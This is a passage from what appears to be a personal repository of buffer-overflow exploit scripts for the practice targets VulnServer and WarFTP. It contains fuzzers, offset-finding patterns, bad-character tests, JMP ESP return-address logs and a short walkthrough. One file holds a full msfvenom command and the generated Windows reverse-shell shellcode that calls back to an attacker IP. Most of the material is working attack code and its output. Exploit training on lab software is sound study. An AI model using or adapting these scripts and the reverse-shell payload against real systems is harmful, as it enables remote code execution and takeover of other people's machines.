) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("LTER "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = 
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." 
) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | 
"\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('TRUN /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 
offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3
Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | 
Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | 
s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("TRUN "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/BadChar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | buffer = "A" * 485 + "B" * 4 + badchars 13 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 14 | connect=s.connect(('192.168.0.134',21)) 15 | response = s.recv(1024) 16 | 
print response 17 | s.send('USER ' + buffer + '\r\n') 18 | response = s.recv(1024) 19 | print response 20 | s.send('PASS PASSWORD\r\n') 21 | s.close() 22 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | buffer = "A" * 1100 4 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 5 | connect=s.connect(('192.168.0.134',21)) 6 | response = s.recv(1024) 7 | print response 8 | s.send('USER ' + buffer + '\r\n') 9 | response = s.recv(1024) 10 | print response 11 | s.send('PASS PASSWORD\r\n') 12 | s.close() 13 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | buffer = "A" * 485 + "B" * 4 + "D" * (1100-len(buffer)) 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | connect=s.connect(('192.168.0.134',21)) 7 | response = s.recv(1024) 8 | print response 9 | s.send('USER ' + buffer + '\r\n') 10 | response = s.recv(1024) 11 | print response 12 | s.send('PASS PASSWORD\r\n') 13 | s.close() 14 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | buffer = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | connect=s.connect(('192.168.0.134',21)) 7 | response = s.recv(1024) 8 | print response 9 | s.send('USER ' + buffer + '\r\n') 10 | response = s.recv(1024) 11 | print response 12 | s.send('PASS PASSWORD\r\n') 13 | s.close() 14 | -------------------------------------------------------------------------------- /BufferOverflow/WarFTp/Walkthough wartpo: -------------------------------------------------------------------------------- 1 | App : War FTP 2 | 3 | IP 192.168.0.134 4 | Port:21 5 | 6 | ________________________________________________ 7 | 1. Send Fuzzin and crash remote application at 1100 8 | 9 | 2. Send Paylaod and find EIP => 32714131 10 | 11 | 3. FInd Offset 485 12 | 13 | 4. Send EIP control paylaod buffer = "A" * 485 + "B" * 4 + "D" * (1100-len(buffer)) 14 | 15 | 5. Find Bad Char = > \x00, \X0A, and \ x0d 16 | 17 | 6. 
JMP ESP => !mona modules 18 | 7C9D30D7 19 | 20 | 7. Sending final payload -------------------------------------------------------------------------------- /BufferOverflow/crossfire/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | 6 | exploit=() 7 | 8 | 9 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.1.133',9999)) 14 | print("Sending pattern to Remote server....." ) 15 | s.send(('TRUN /.:/'+ Shellcode)) 16 | s.close() 17 | 18 | except: 19 | print("Error in connecting") 20 | sys.exit() 21 | -------------------------------------------------------------------------------- /BufferOverflow/crossfire/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | 